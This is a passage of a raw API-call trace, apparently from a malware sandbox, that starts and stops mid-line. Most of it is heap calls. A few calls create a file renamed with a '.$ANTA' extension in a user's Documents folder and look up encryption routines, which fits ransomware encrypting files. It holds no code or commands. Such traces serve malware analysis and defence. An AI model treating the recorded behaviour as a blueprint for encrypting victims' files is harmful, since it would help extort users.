hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0084.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0084.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0084.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0084.447] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0084.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0084.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0084.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0084.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0084.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0084.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0084.448] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0084.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0084.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0084.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0084.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0084.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0084.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0084.449] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0084.449] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0084.449] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0084.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0084.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0084.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0084.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0084.453] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0084.453] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ea78*=0x74e6, lpOverlapped=0x0) returned 1 [0084.511] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0084.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0084.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0084.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x74e6) returned 0x43fd3b8 [0084.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0084.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0084.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0084.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0084.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x74e6) returned 0x44048a8 [0084.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fd3b8 | out: hHeap=0x1780000) returned 1 [0084.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0084.515] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0084.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0084.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0084.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0084.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0084.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x74e6) returned 0x43fd3b8 [0084.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0084.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fd3b8 | out: hHeap=0x1780000) returned 1 [0084.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0084.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0084.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0084.517] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0084.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0084.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0084.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0084.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0084.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0084.518] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0084.518] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0084.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0084.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x74e6) returned 0x43fd3b8 [0084.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2830 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0084.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0084.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0084.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0084.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0084.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0084.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2920 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0084.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x74e6) returned 0x49aa010 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0084.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0084.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0084.522] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0084.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0084.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0084.522] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0084.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0084.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0084.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0084.523] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0084.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0084.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0084.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0084.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0084.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0084.524] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0084.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0084.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0084.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0084.525] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0084.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0084.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0084.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0084.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0084.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0084.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0084.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0084.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0084.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0084.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0084.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0084.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0084.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.526] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0084.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0084.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0084.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0084.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0084.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0084.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0084.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0084.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0084.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0084.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0084.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0084.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0084.527] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0084.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0084.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0084.527] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0084.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0084.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0084.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0084.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0084.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 